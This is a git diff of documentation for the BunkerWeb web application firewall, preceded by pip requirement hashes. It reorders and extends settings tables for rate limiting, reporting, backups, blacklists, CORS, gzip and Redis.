--hash=sha256:1118ba9def608250250f4b3e3f48c62f4562ba16ca58ede491b6e7554bfa09ff \
--hash=sha256:12446827f43c7881decf2c126762e11425de5eb93b3b0d8b581344c16db7047a \
--hash=sha256:14905ed75c7a6edf423eb46c213ed3f4507c38115f1ed3c00f4ec9eafba50e58 \
--hash=sha256:15e593386ec6331e0ab4ac0795b7593f02ab2f4b30a698beb89fbdc34f92386a \
--hash=sha256:160ba087232c5c6e2a1e7ad08bd3a3f49b58c815be0504d8c8aacfb064491cd8 \
--hash=sha256:161a206c8f3511e2f5fafc9142a2cc25d7fe9a1ec5ad9b4ad2496a7c33e1c5d2 \
--hash=sha256:169fd0acd7a259f58f417e492e93d0e15fc87592cd1e971c8c533ad5703b5830 \
--hash=sha256:193b7c6834a06f722f0ce1ba685efe80881de7c3de31415513862f601097648c \
--hash=sha256:1a3903128f9e17a500618e80c68165c78c741ebb17dd1a0b44575f92c3c68b02 \
--hash=sha256:1d5bd666466c8f00a06886ce1397ba8b12371c1f1c6d1bef11013e9e0a1464a8 \
--hash=sha256:224a9269f133564109ce668213ef3cb32bc72ccf040b0b51c72a50e569e9dc9e \
--hash=sha256:236cace6c1903effd647ed46ce6dd5d76d54985fc36dafc5256032886736c85d \
--hash=sha256:249fbcee0a277c32a3ce36d8e36d50c27c968fdf969e0fbe342658d4e010fbc8 \
--hash=sha256:29d839829209f3c53f004e1de8c3113efce6d98029f044fa5cfee666253ee7e6 \
--hash=sha256:2c8982ee19ccecabbaeac1ba687bfef085a6352a8c64f821ce2f43e6d76a9298 \
--hash=sha256:2f30a5ab8902f93930dc6f627c4dd5da2703333287081c85cace0fc6e21c25af \
--hash=sha256:304e7e2418146ae4d0ef0e9ffa28f881f7874b45b4994cc2279b21b6e7ae50c8 \
--hash=sha256:32e5f3b8e32918bfbdd12eca62e49ab3031125c454b507127ad6ecbd86e62fca \
--hash=sha256:334b79ce9c08f26b4659a53f42892793948a613c46f1b583e985fd5a6bf1c149 \
--hash=sha256:33d19f0cde6838c81acffff25c7708e4adc7dd02896c9ec25c3939b1500a1778 \
--hash=sha256:3799e36d60a35162bb35b2246d8bb012192b7437dff807ef79c14e7352706306 \
--hash=sha256:42be5de7cc8c1edac55db92d82b68dc8e683b204d6f5414c5a51997a323d7081 \
--hash=sha256:44b3267cea873684af022822195298501568ed44d542f9a2d9bebc0212e99069 \
--hash=sha256:458d68d34fb74b906709735c927c029e62f7d06437a98af1b5b6258025223210 \
--hash=sha256:45cc13d398b6359a7708986386f72bd156ae781c3e83a68a6d4cee5af04b1ce9 \
--hash=sha256:4e7eaf9df15423d07b6050fb91f86c66307171b95ea53e2d87a7993b6d02c7f7 \
--hash=sha256:4fad420b14ae1970a1f322e8ae84a1d9d89375eb71e1b504060ab2d1bfe68f3c \
--hash=sha256:504b5116e2bd1821efd815941edff7535e93372a098e156bb9dffde30264e798 \
--hash=sha256:50e7e96a527488334379e05755b210b7da4a60fc5d6481938c1fa053e0c92184 \
--hash=sha256:51d27844763c273a122e08a3e86e7aefa54ee09fb672d96a645ece0454d8425e \
--hash=sha256:5253dcb0bfda7214523de58b002eb0090cb530d7c55993ce5f6d17faf953ece7 \
--hash=sha256:534efd2653ebc4f26fc0e47234e53bf0cb4715bb61f98c64d2774a278b58c846 \
--hash=sha256:560278c9975694e1f0bc50da187abf2cdc1e4890739ea33df2bc4a85eeef143e \
--hash=sha256:571452362d552de508c37191b6abbbb660028b8b418e2d68c20779e0bc8eaaa8 \
--hash=sha256:62b5f7910b639f3c1d122d408421317c351e213ca39c964ad4121f27916631c6 \
--hash=sha256:696639a73ca78a380acfaa0a1f6dd8220616a99074c05bba9ba8bb916914b224 \
--hash=sha256:6ccdeef4584450b6f0bddd5135354908dacad95425fcb629fe36d13e48b60f32 \
--hash=sha256:70364a097437dd0a90b31cd77f09f7387ad9ac60ef57590971f43b7fca3082a5 \
--hash=sha256:7117cb7d6ac7f2e985f3d18aa8a1728864097da1a677ffa69e970ca215baebf1 \
--hash=sha256:7467ad8b0eac0b28e52679e972b9b234b3de0ea5cee12eb50091d2b68145fe36 \
--hash=sha256:7d35d4cc9270944e95f9c88af757b0c9fc43f396917e143a5756608462c5223b \
--hash=sha256:7dda3091838206969c2b286f9832dff41e2da545b99d1cfaea9ebd8584d02708 \
--hash=sha256:853cc36e756ff673bf984e9044ccc8fad60b95a748915dddeab9488aea974c73 \
--hash=sha256:8722f72068b3e1156a4b2e1afde6810f1fc67155a9fa30a4b9d5b4bc46f18fb0 \
--hash=sha256:8c6c71cf92b09e5faa72ea2c68aa1f61c9ce11cb66fdc5069d712f4392ddfd00 \
--hash=sha256:903350bf44d7e4116b4d5898b30b15755d61dcd3161e3413a49c7db76f0bee5a \
--hash=sha256:91b53dea84415e8115506cc62e441a2b54537359c63d856d73cb1abe05af4c9a \
--hash=sha256:951be1eae7b47660412dc4938777a975ebc41936d64e28081bf2e584b47ec246 \
--hash=sha256:972b49f2fe1047b9249c958ec4fa1bdd2cf8ce305dc19d27546d5a38e57732d8 \
--hash=sha256:9a8625849387b9d558d528e263ecc9c0fbde86cfa5c2f0eef43fff480ae24d71 \
--hash=sha256:9cdbb1998da94607d5eec02566b9586f0e70d6438abf1b690261aac0edda7ab6 \
--hash=sha256:9e6d4d6ae1827b2f8c7200aaf7501c37cf3f3896c86a6aaf2566448397c823dd \
--hash=sha256:aab65121229c2ecdf4a31b793d99a6a0501225bd39b616e653c87b219ed34a49 \
--hash=sha256:ab98016541543692a37905871a5ffca59b16e08aacc3d7d10a27297b443f572d \
--hash=sha256:ad45f3bccfcb00868f2871dce02a755529838d2b86163ab8a246115e80cfb7d6 \
--hash=sha256:b43b78f9386d3d932a6ce5af4b45f393d2e93693ee18dc4800d30a8909df700e \
--hash=sha256:b66421f8878a0c82fc0c272a43e2121c8d4c67cb37429b764f0d5ad70b82993b \
--hash=sha256:ba034c8db4b264ef1601eb33cd23d87c5013b8fb48b8161debe2e5d3bd9156b0 \
--hash=sha256:bbdc5db2c98ac2bf1971ffa1410c87ca7a15800415f788971e8ba8520fc0fda9 \
--hash=sha256:bc0db93ad039fc2fe32ccd3dd0e0e70c4f3d6e37ae83f0a487e1aba939bd2fbd \
--hash=sha256:bf7c8ee4861d9ef5b1120abb75846828c811f932d63311596ad25fa168053e00 \
--hash=sha256:bf9596cba92ce7b1fd32c7b07c6e3212c7eed0edc271757e48bfcd2b54646452 \
--hash=sha256:c43395a3b7cc9862801a65c6994678484f186ce13c929abab44fb8a9e473a55a \
--hash=sha256:c46a76a599fcbf95f98755275c5527304cc4f1bb69919434c1e15544d7052910 \
--hash=sha256:ca23b41355ba95929e9505ee04e55495726aa2282003ed9b012d86f857d3e49b \
--hash=sha256:cd832bd9b6120d6074f39bdfbb3c80e416848b07ac72910f1c7f03131a6debc3 \
--hash=sha256:cfa6d61a76c77610ba9274c1a90a453062bdf6887858afbe214d18ad41cf6bde \
--hash=sha256:d8a0f0ab5453e409586b11ebe91c672040bc804ca98d03a656825f7890cbdf88 \
--hash=sha256:e91b1976358e17197157b405cab408a5f4e33310cda211c49fc6da7cffd0b2f0 \
--hash=sha256:ea057306ab469130167014b662643cfaed84651c792948891d003cf0039223a5 \
--hash=sha256:eda3dd46df535da787ffb9036b5140f941ecb91701717df91c9daf64cabef953 \
--hash=sha256:f03b1dbd4d9596dd84955bb40f7d885204d6aac0d56a919bb1e0ff2fb7e1735a \
--hash=sha256:fa9335674d7c819674467c7b46154196c51efbaf5f5715187fd366814ba3fa39
# via mkdocs-material
requests==2.31.0 \
--hash=sha256:58cd2187c01e70e6e26505bca751777aa9f2ee0b7f4300988b709f44e013003f \

74
docs/security-tuning.md
View file

@ -552,15 +552,11 @@ STREAM support :x:
The following settings are related to the Limiting requests feature :
| Setting | Default | Context | Multiple | Description |
| ----------------------- | ------- | --------- | -------- | --------------------------------------------------------------------------------------------- |
| `USE_LIMIT_REQ` | `yes` | multisite | no | Activate limit requests feature. |
| `LIMIT_REQ_URL` | `/` | multisite | yes | URL (PCRE regex) where the limit request will be applied or special value / for all requests. |
| `LIMIT_REQ_RATE` | `2r/s` | multisite | yes | Rate to apply to the URL (s for second, m for minute, h for hour and d for day). |
| `USE_LIMIT_CONN` | `yes` | multisite | no | Activate limit connections feature. |
| `LIMIT_CONN_MAX_HTTP1` | `10` | multisite | no | Maximum number of connections per IP when using HTTP/1.X protocol. |
| `LIMIT_CONN_MAX_HTTP2` | `100` | multisite | no | Maximum number of streams per IP when using HTTP/2 protocol. |
| `LIMIT_CONN_MAX_STREAM` | `10` | multisite | no | Maximum number of connections per IP when using stream. |
| Setting | Default | Context | Multiple | Description |
| ---------------- | ------- | --------- | -------- | --------------------------------------------------------------------------------------------- |
| `USE_LIMIT_REQ` | `yes` | multisite | no | Activate limit requests feature. |
| `LIMIT_REQ_URL` | `/` | multisite | yes | URL (PCRE regex) where the limit request will be applied or special value / for all requests. |
| `LIMIT_REQ_RATE` | `2r/s` | multisite | yes | Rate to apply to the URL (s for second, m for minute, h for hour and d for day). |
Please note that you can add different rates for different URLs by adding a number as a suffix to the settings for example : `LIMIT_REQ_URL_1=^/url1$`, `LIMIT_REQ_RATE_1=5r/d`, `LIMIT_REQ_URL_2=^/url2/subdir/.*$`, `LIMIT_REQ_RATE_2=1r/m`, ...
@ -679,19 +675,20 @@ The Reporting plugin provides a comprehensive solution for regular reporting of
**List of settings**
| Setting | Default | Context | Description |
| ------------------------------ | -------- | -------- | ---------------------------------------------------------------------------------------------------------------------------------- |
| `USE_REPORTING_SMTP` | `no` | `global` | Enable sending the report via email. |
| `USE_REPORTING_WEBHOOK` | `no` | `global` | Enable sending the report via webhook. |
| `REPORTING_SCHEDULE` | `weekly` | `global` | The frequency at which reports are sent. |
| `REPORTING_WEBHOOK_URLS` | | `global` | List of webhook URLs to receive the report in Markdown (separated by spaces). |
| `REPORTING_SMTP_EMAILS` | | `global` | List of email addresses to receive the report in HTML format (separated by spaces). |
| `REPORTING_SMTP_HOST` | | `global` | The host server used for SMTP sending. |
| `REPORTING_SMTP_PORT` | `465` | `global` | The port used for SMTP. Please note that there are different standards depending on the type of connection (SSL = 465, TLS = 587). |
| `REPORTING_SMTP_FROM_EMAIL` | | `global` | The email address used as the sender. Note that 2FA must be disabled for this email address. |
| `REPORTING_SMTP_FROM_USER` | | `global` | The user authentication value for sending via the from email address. |
| `REPORTING_SMTP_FROM_PASSWORD` | | `global` | The password authentication value for sending via the from email address. |
| `REPORTING_SMTP_SSL` | `SSL` | `global` | Determine whether or not to use a secure connection for SMTP. |
| Setting | Default | Context | Description |
| ------------------------------ | ------------------ | ------- | ---------------------------------------------------------------------------------------------------------------------------------- |
| `USE_REPORTING_SMTP` | `no` | global | Enable sending the report via email. |
| `USE_REPORTING_WEBHOOK` | `no` | global | Enable sending the report via webhook. |
| `REPORTING_SCHEDULE` | `weekly` | global | The frequency at which reports are sent. |
| `REPORTING_WEBHOOK_URLS` | | global | List of webhook URLs to receive the report in Markdown (separated by spaces). |
| `REPORTING_SMTP_EMAILS` | | global | List of email addresses to receive the report in HTML format (separated by spaces). |
| `REPORTING_SMTP_HOST` | | global | The host server used for SMTP sending. |
| `REPORTING_SMTP_PORT` | `465` | global | The port used for SMTP. Please note that there are different standards depending on the type of connection (SSL = 465, TLS = 587). |
| `REPORTING_SMTP_FROM_EMAIL` | | global | The email address used as the sender. Note that 2FA must be disabled for this email address. |
| `REPORTING_SMTP_FROM_USER` | | global | The user authentication value for sending via the from email address. |
| `REPORTING_SMTP_FROM_PASSWORD` | | global | The password authentication value for sending via the from email address. |
| `REPORTING_SMTP_SSL` | `SSL` | global | Determine whether or not to use a secure connection for SMTP. |
| `REPORTING_SMTP_SUBJECT` | `BunkerWeb Report` | global | The subject line of the email. |
!!! info "Information and behavior"
- case `USE_REPORTING_SMTP` is set to `yes`, the setting `REPORTING_SMTP_EMAILS` must be set.
@ -941,17 +938,18 @@ By activating this feature, you're proactively safeguarding your **data's integr
**List of settings**
| Setting | Default | Context | Description |
| ----------------------------- | ------- | ------- | ------------------------------------------------ |
| `USE_BACKUP_S3` | `no` | global | Enable or disable the S3 backup feature |
| `BACKUP_S3_SCHEDULE` | `daily` | global | Frequency of the backup (daily, weekly, monthly) |
| `BACKUP_S3_ROTATION` | `7` | global | Number of backups to keep |
| `BACKUP_S3_ENDPOINT` | | global | S3 endpoint |
| `BACKUP_S3_BUCKET` | | global | S3 bucket name |
| `BACKUP_S3_REGION` | | global | S3 region |
| `BACKUP_S3_ACCESS_KEY_ID` | | global | S3 access key ID |
| `BACKUP_S3_ACCESS_KEY_SECRET` | | global | S3 access key secret |
| `BACKUP_S3_COMP_LEVEL` | `6` | global | Compression level of the backup zip file (1-9) |
| Setting | Default | Context | Description |
| ----------------------------- | ------- | ------- | -------------------------------------------- |
| `USE_BACKUP_S3` | `no` | global | Enable or disable the S3 backup feature |
| `BACKUP_S3_SCHEDULE` | `daily` | global | The frequency of the backup |
| `BACKUP_S3_ROTATION` | `7` | global | The number of backups to keep |
| `BACKUP_S3_ENDPOINT` | | global | The S3 endpoint |
| `BACKUP_S3_BUCKET` | | global | The S3 bucket |
| `BACKUP_S3_DIR` | | global | The S3 directory |
| `BACKUP_S3_REGION` | | global | The S3 region |
| `BACKUP_S3_ACCESS_KEY_ID` | | global | The S3 access key ID |
| `BACKUP_S3_ACCESS_KEY_SECRET` | | global | The S3 access key secret |
| `BACKUP_S3_COMP_LEVEL` | `6` | global | The compression level of the backup zip file |
#### Manual backup
@ -1067,13 +1065,11 @@ You can also specify a custom backup file for the restore by providing the path
docker exec -it <scheduler_container> bwcli plugin backup_s3 restore
```
## Migration of BunkerWeb
### Migration <img src='../assets/img/pro-icon.svg' alt='crow pro icon' height='24px' width='24px' style="transform : translateY(3px);"> (PRO)
## Migration <img src='../assets/img/pro-icon.svg' alt='crow pro icon' height='24px' width='24px' style="transform : translateY(3px);"> (PRO)
STREAM support :white_check_mark:
The Migration tool **revolutionizes** BunkerWeb configuration transfers between instances with its **user-friendly web interface**, simplifying the entire migration journey. Whether you're upgrading systems, scaling infrastructure, or transitioning environments, this tool empowers you to effortlessly transfer **settings, preferences, and data** with unmatched ease and confidence. Say goodbye to cumbersome manual processes and hello to a **seamless, hassle-free migration experience**.
The Migration plugin **revolutionizes** BunkerWeb configuration transfers between instances with its **user-friendly web interface**, simplifying the entire migration journey. Whether you're upgrading systems, scaling infrastructure, or transitioning environments, this tool empowers you to effortlessly transfer **settings, preferences, and data** with unmatched ease and confidence. Say goodbye to cumbersome manual processes and hello to a **seamless, hassle-free migration experience**.
**List of features**
@ -1083,7 +1079,7 @@ The Migration tool **revolutionizes** BunkerWeb configuration transfers between
- **Cross-Database Compatibility:** Enjoy seamless migration across various database platforms, including SQLite, MySQL, MariaDB, and PostgreSQL, ensuring compatibility with your preferred database environment.
#### Create a migration file
### Create a migration file
To manually create a migration file, execute the following command:
@ -1143,7 +1139,7 @@ This command will create a backup of your database and store it in the backup di
...
```
#### Initialize a migration
### Initialize a migration
To manually initialize a migration, execute the following command:

111
docs/settings.md
View file

@ -63,6 +63,8 @@ Bot detection by using a challenge.
|---------------------------|------------|---------|--------|------------------------------------------------------------------------------------------------------------------------------|
|`USE_ANTIBOT` |`no` |multisite|no |Activate antibot feature. |
|`ANTIBOT_URI` |`/challenge`|multisite|no |Unused URI that clients will be redirected to to solve the challenge. |
|`ANTIBOT_TIME_RESOLVE` |`60` |multisite|no |Maximum time (in seconds) clients have to resolve the challenge. Once this time has passed, a new challenge will be generated.|
|`ANTIBOT_TIME_VALID` |`86400` |multisite|no |Maximum validity time of solved challenges. Once this time has passed, clients will need to resolve a new one. |
|`ANTIBOT_RECAPTCHA_SCORE` |`0.7` |multisite|no |Minimum score required for reCAPTCHA challenge. |
|`ANTIBOT_RECAPTCHA_SITEKEY`| |multisite|no |Sitekey for reCAPTCHA challenge. |
|`ANTIBOT_RECAPTCHA_SECRET` | |multisite|no |Secret for reCAPTCHA challenge. |
@ -70,8 +72,6 @@ Bot detection by using a challenge.
|`ANTIBOT_HCAPTCHA_SECRET` | |multisite|no |Secret for hCaptcha challenge. |
|`ANTIBOT_TURNSTILE_SITEKEY`| |multisite|no |Sitekey for Turnstile challenge. |
|`ANTIBOT_TURNSTILE_SECRET` | |multisite|no |Secret for Turnstile challenge. |
|`ANTIBOT_TIME_RESOLVE` |`60` |multisite|no |Maximum time (in seconds) clients have to resolve the challenge. Once this time has passed, a new challenge will be generated.|
|`ANTIBOT_TIME_VALID` |`86400` |multisite|no |Maximum validity time of solved challenges. Once this time has passed, clients will need to resolve a new one. |
## Auth basic
@ -93,12 +93,12 @@ STREAM support :white_check_mark:
Backup your data to a custom location. Ensure the safety and availability of your important files by creating regular backups.
| Setting | Default |Context|Multiple| Description |
|------------------|----------------------------|-------|--------|---------------------------------------------|
|`USE_BACKUP` |`yes` |global |no |Enable or disable the backup feature |
|`BACKUP_DIRECTORY`|`/var/lib/bunkerweb/backups`|global |no |The directory where the backup will be stored|
|`BACKUP_SCHEDULE` |`daily` |global |no |The frequency of the backup |
|`BACKUP_ROTATION` |`7` |global |no |The number of backups to keep |
| Setting | Default |Context|Multiple| Description |
|------------------|----------------------------|-------|--------|------------------------------------------------------|
|`USE_BACKUP` |`yes` |global |no |Enable or disable the backup feature |
|`BACKUP_SCHEDULE` |`daily` |global |no |The frequency of the backup (daily, weekly or monthly)|
|`BACKUP_ROTATION` |`7` |global |no |The number of backups to keep |
|`BACKUP_DIRECTORY`|`/var/lib/bunkerweb/backups`|global |no |The directory where the backup will be stored |
## Backup S3 <img src='../assets/img/pro-icon.svg' alt='crow pro icon' height='24px' width='24px' style='transform : translateY(3px);'> (PRO)
@ -114,6 +114,7 @@ Automatically backup your data to an S3 bucket
|`BACKUP_S3_ROTATION` |`7` |global |no |The number of backups to keep |
|`BACKUP_S3_ENDPOINT` | |global |no |The S3 endpoint |
|`BACKUP_S3_BUCKET` | |global |no |The S3 bucket |
|`BACKUP_S3_DIR` | |global |no |The S3 directory |
|`BACKUP_S3_REGION` | |global |no |The S3 region |
|`BACKUP_S3_ACCESS_KEY_ID` | |global |no |The S3 access key ID |
|`BACKUP_S3_ACCESS_KEY_SECRET`| |global |no |The S3 access key secret |
@ -129,9 +130,9 @@ Ban IP generating too much 'bad' HTTP status code in a period of time.
|---------------------------|-----------------------------|---------|--------|--------------------------------------------------------------------------------------------|
|`USE_BAD_BEHAVIOR` |`yes` |multisite|no |Activate Bad behavior feature. |
|`BAD_BEHAVIOR_STATUS_CODES`|`400 401 403 404 405 429 444`|multisite|no |List of HTTP status codes considered as 'bad'. |
|`BAD_BEHAVIOR_BAN_TIME` |`86400` |multisite|no |The duration time (in seconds) of a ban when the corresponding IP has reached the threshold.|
|`BAD_BEHAVIOR_THRESHOLD` |`10` |multisite|no |Maximum number of 'bad' HTTP status codes within the period of time before IP is banned. |
|`BAD_BEHAVIOR_COUNT_TIME` |`60` |multisite|no |Period of time (in seconds) during which we count 'bad' HTTP status codes. |
|`BAD_BEHAVIOR_BAN_TIME` |`86400` |multisite|no |The duration time (in seconds) of a ban when the corresponding IP has reached the threshold.|
## Blacklist
@ -143,25 +144,25 @@ Deny access based on internal and external IP/network/rDNS/ASN blacklists.
|----------------------------------|------------------------------------------------------------------------------------------------------------------------------|---------|--------|------------------------------------------------------------------------------------------------|
|`USE_BLACKLIST` |`yes` |multisite|no |Activate blacklist feature. |
|`BLACKLIST_IP` | |multisite|no |List of IP/network, separated with spaces, to block. |
|`BLACKLIST_IP_URLS` |`https://www.dan.me.uk/torlist/?exit` |global |no |List of URLs, separated with spaces, containing bad IP/network to block. |
|`BLACKLIST_RDNS_GLOBAL` |`yes` |multisite|no |Only perform RDNS blacklist checks on global IP addresses. |
|`BLACKLIST_RDNS` |`.shodan.io .censys.io` |multisite|no |List of reverse DNS suffixes, separated with spaces, to block. |
|`BLACKLIST_RDNS_URLS` | |global |no |List of URLs, separated with spaces, containing reverse DNS suffixes to block. |
|`BLACKLIST_RDNS_GLOBAL` |`yes` |multisite|no |Only perform RDNS blacklist checks on global IP addresses. |
|`BLACKLIST_ASN` | |multisite|no |List of ASN numbers, separated with spaces, to block. |
|`BLACKLIST_ASN_URLS` | |global |no |List of URLs, separated with spaces, containing ASN to block. |
|`BLACKLIST_USER_AGENT` | |multisite|no |List of User-Agent (PCRE regex), separated with spaces, to block. |
|`BLACKLIST_USER_AGENT_URLS` |`https://raw.githubusercontent.com/mitchellkrogza/nginx-ultimate-bad-bot-blocker/master/_generator_lists/bad-user-agents.list`|global |no |List of URLs, separated with spaces, containing bad User-Agent to block. |
|`BLACKLIST_URI` | |multisite|no |List of URI (PCRE regex), separated with spaces, to block. |
|`BLACKLIST_URI_URLS` | |global |no |List of URLs, separated with spaces, containing bad URI to block. |
|`BLACKLIST_IGNORE_IP` | |multisite|no |List of IP/network, separated with spaces, to ignore in the blacklist. |
|`BLACKLIST_IGNORE_IP_URLS` | |global |no |List of URLs, separated with spaces, containing IP/network to ignore in the blacklist. |
|`BLACKLIST_IGNORE_RDNS` | |multisite|no |List of reverse DNS suffixes, separated with spaces, to ignore in the blacklist. |
|`BLACKLIST_IGNORE_RDNS_URLS` | |global |no |List of URLs, separated with spaces, containing reverse DNS suffixes to ignore in the blacklist.|
|`BLACKLIST_IGNORE_ASN` | |multisite|no |List of ASN numbers, separated with spaces, to ignore in the blacklist. |
|`BLACKLIST_IGNORE_ASN_URLS` | |global |no |List of URLs, separated with spaces, containing ASN to ignore in the blacklist. |
|`BLACKLIST_IGNORE_USER_AGENT` | |multisite|no |List of User-Agent (PCRE regex), separated with spaces, to ignore in the blacklist. |
|`BLACKLIST_IGNORE_USER_AGENT_URLS`| |global |no |List of URLs, separated with spaces, containing User-Agent to ignore in the blacklist. |
|`BLACKLIST_IGNORE_URI` | |multisite|no |List of URI (PCRE regex), separated with spaces, to ignore in the blacklist. |
|`BLACKLIST_IP_URLS` |`https://www.dan.me.uk/torlist/?exit` |global |no |List of URLs, separated with spaces, containing bad IP/network to block. |
|`BLACKLIST_RDNS_URLS` | |global |no |List of URLs, separated with spaces, containing reverse DNS suffixes to block. |
|`BLACKLIST_ASN_URLS` | |global |no |List of URLs, separated with spaces, containing ASN to block. |
|`BLACKLIST_USER_AGENT_URLS` |`https://raw.githubusercontent.com/mitchellkrogza/nginx-ultimate-bad-bot-blocker/master/_generator_lists/bad-user-agents.list`|global |no |List of URLs, separated with spaces, containing bad User-Agent to block. |
|`BLACKLIST_URI_URLS` | |global |no |List of URLs, separated with spaces, containing bad URI to block. |
|`BLACKLIST_IGNORE_IP_URLS` | |global |no |List of URLs, separated with spaces, containing IP/network to ignore in the blacklist. |
|`BLACKLIST_IGNORE_RDNS_URLS` | |global |no |List of URLs, separated with spaces, containing reverse DNS suffixes to ignore in the blacklist.|
|`BLACKLIST_IGNORE_ASN_URLS` | |global |no |List of URLs, separated with spaces, containing ASN to ignore in the blacklist. |
|`BLACKLIST_IGNORE_USER_AGENT_URLS`| |global |no |List of URLs, separated with spaces, containing User-Agent to ignore in the blacklist. |
|`BLACKLIST_IGNORE_URI_URLS` | |global |no |List of URLs, separated with spaces, containing URI to ignore in the blacklist. |
## Brotli
@ -198,14 +199,14 @@ Cross-Origin Resource Sharing.
|------------------------------|------------------------------------------------------------------------------------|---------|--------|-------------------------------------------------------------------|
|`USE_CORS` |`no` |multisite|no |Use CORS |
|`CORS_ALLOW_ORIGIN` |`*` |multisite|no |Allowed origins to make CORS requests : PCRE regex or *. |
|`CORS_ALLOW_METHODS` |`GET, POST, OPTIONS` |multisite|no |Value of the Access-Control-Allow-Methods header. |
|`CORS_ALLOW_HEADERS` |`DNT,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range`|multisite|no |Value of the Access-Control-Allow-Headers header. |
|`CORS_ALLOW_CREDENTIALS` |`no` |multisite|no |Send the Access-Control-Allow-Credentials header. |
|`CORS_EXPOSE_HEADERS` |`Content-Length,Content-Range` |multisite|no |Value of the Access-Control-Expose-Headers header. |
|`CROSS_ORIGIN_OPENER_POLICY` | |multisite|no |Value for the Cross-Origin-Opener-Policy header. |
|`CROSS_ORIGIN_EMBEDDER_POLICY`| |multisite|no |Value for the Cross-Origin-Embedder-Policy header. |
|`CROSS_ORIGIN_RESOURCE_POLICY`| |multisite|no |Value for the Cross-Origin-Resource-Policy header. |
|`CORS_MAX_AGE` |`86400` |multisite|no |Value of the Access-Control-Max-Age header. |
|`CORS_ALLOW_CREDENTIALS` |`no` |multisite|no |Send the Access-Control-Allow-Credentials header. |
|`CORS_ALLOW_METHODS` |`GET, POST, OPTIONS` |multisite|no |Value of the Access-Control-Allow-Methods header. |
|`CORS_ALLOW_HEADERS` |`DNT,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range`|multisite|no |Value of the Access-Control-Allow-Headers header. |
|`CORS_DENY_REQUEST` |`yes` |multisite|no |Deny request and don't send it to backend if Origin is not allowed.|
## Client cache
@ -289,15 +290,15 @@ Allow access while keeping security features based on internal and external IP/n
|--------------------------|-------|---------|--------|----------------------------------------------------------------------------------------------|
|`USE_GREYLIST` |`no` |multisite|no |Activate greylist feature. |
|`GREYLIST_IP` | |multisite|no |List of IP/network, separated with spaces, to put into the greylist. |
|`GREYLIST_IP_URLS` | |global |no |List of URLs, separated with spaces, containing good IP/network to put into the greylist. |
|`GREYLIST_RDNS_GLOBAL` |`yes` |multisite|no |Only perform RDNS greylist checks on global IP addresses. |
|`GREYLIST_RDNS` | |multisite|no |List of reverse DNS suffixes, separated with spaces, to put into the greylist. |
|`GREYLIST_RDNS_URLS` | |global |no |List of URLs, separated with spaces, containing reverse DNS suffixes to put into the greylist.|
|`GREYLIST_RDNS_GLOBAL` |`yes` |multisite|no |Only perform RDNS greylist checks on global IP addresses. |
|`GREYLIST_ASN` | |multisite|no |List of ASN numbers, separated with spaces, to put into the greylist. |
|`GREYLIST_ASN_URLS` | |global |no |List of URLs, separated with spaces, containing ASN to put into the greylist. |
|`GREYLIST_USER_AGENT` | |multisite|no |List of User-Agent (PCRE regex), separated with spaces, to put into the greylist. |
|`GREYLIST_USER_AGENT_URLS`| |global |no |List of URLs, separated with spaces, containing good User-Agent to put into the greylist. |
|`GREYLIST_URI` | |multisite|no |List of URI (PCRE regex), separated with spaces, to put into the greylist. |
|`GREYLIST_IP_URLS` | |global |no |List of URLs, separated with spaces, containing good IP/network to put into the greylist. |
|`GREYLIST_RDNS_URLS` | |global |no |List of URLs, separated with spaces, containing reverse DNS suffixes to put into the greylist.|
|`GREYLIST_ASN_URLS` | |global |no |List of URLs, separated with spaces, containing ASN to put into the greylist. |
|`GREYLIST_USER_AGENT_URLS`| |global |no |List of URLs, separated with spaces, containing good User-Agent to put into the greylist. |
|`GREYLIST_URI_URLS` | |global |no |List of URLs, separated with spaces, containing bad URI to put into the greylist. |
## Gzip
@ -312,6 +313,7 @@ Compress HTTP requests with the gzip algorithm.
|`GZIP_TYPES` |`application/atom+xml application/javascript application/json application/rss+xml application/vnd.ms-fontobject application/x-font-opentype application/x-font-truetype application/x-font-ttf application/x-javascript application/xhtml+xml application/xml font/eot font/opentype font/otf font/truetype image/svg+xml image/vnd.microsoft.icon image/x-icon image/x-win-bitmap text/css text/javascript text/plain text/xml`|multisite|no |List of MIME types that will be compressed with gzip.|
|`GZIP_MIN_LENGTH`|`1000` |multisite|no |Minimum length for gzip compression. |
|`GZIP_COMP_LEVEL`|`5` |multisite|no |The compression level of the gzip algorithm. |
|`GZIP_PROXIED` |`no-cache no-store private expired auth` |multisite|no |Which kind of proxied requests we should compress. |
## HTML injection
@ -516,9 +518,9 @@ Get real IP of clients when BunkerWeb is behind a reverse proxy / load balancer.
|`USE_REAL_IP` |`no` |multisite|no |Retrieve the real IP of client. |
|`USE_PROXY_PROTOCOL`|`no` |multisite|no |Enable PROXY protocol communication. |
|`REAL_IP_FROM` |`192.168.0.0/16 172.16.0.0/12 10.0.0.0/8`|multisite|no |List of trusted IPs / networks, separated with spaces, where proxied requests come from. |
|`REAL_IP_FROM_URLS` | |global |no |List of URLs containing trusted IPs / networks, separated with spaces, where proxied requests come from.|
|`REAL_IP_HEADER` |`X-Forwarded-For` |multisite|no |HTTP header containing the real IP or special value proxy_protocol for PROXY protocol. |
|`REAL_IP_RECURSIVE` |`yes` |multisite|no |Perform a recursive search in the header container IP address. |
|`REAL_IP_FROM_URLS` | |global |no |List of URLs containing trusted IPs / networks, separated with spaces, where proxied requests come from.|
## Redirect
@ -547,14 +549,14 @@ Redis server configuration when using BunkerWeb in cluster mode.
|`REDIS_SSL` |`no` |global |no |Use SSL/TLS connection with Redis server. |
|`REDIS_SSL_VERIFY` |`no` |global |no |Verify the certificate of Redis server. |
|`REDIS_TIMEOUT` |`1000` |global |no |Redis server timeout (in ms) for connect, read and write. |
|`REDIS_KEEPALIVE_IDLE` |`30000`|global |no |Max idle time (in ms) before closing redis connection in the pool. |
|`REDIS_KEEPALIVE_POOL` |`10` |global |no |Max number of redis connection(s) kept in the pool. |
|`REDIS_USERNAME` | |global |no |Redis username used in AUTH command. |
|`REDIS_PASSWORD` | |global |no |Redis password used in AUTH command. |
|`REDIS_SENTINEL_HOSTS` | |global |no |Redis sentinel hosts with format host:[port] separated with spaces.|
|`REDIS_SENTINEL_USERNAME`| |global |no |Redis sentinel username. |
|`REDIS_SENTINEL_PASSWORD`| |global |no |Redis sentinel password. |
|`REDIS_SENTINEL_MASTER` | |global |no |Redis sentinel master name. |
|`REDIS_KEEPALIVE_IDLE` |`30000`|global |no |Max idle time (in ms) before closing redis connection in the pool. |
|`REDIS_KEEPALIVE_POOL` |`10` |global |no |Max number of redis connection(s) kept in the pool. |
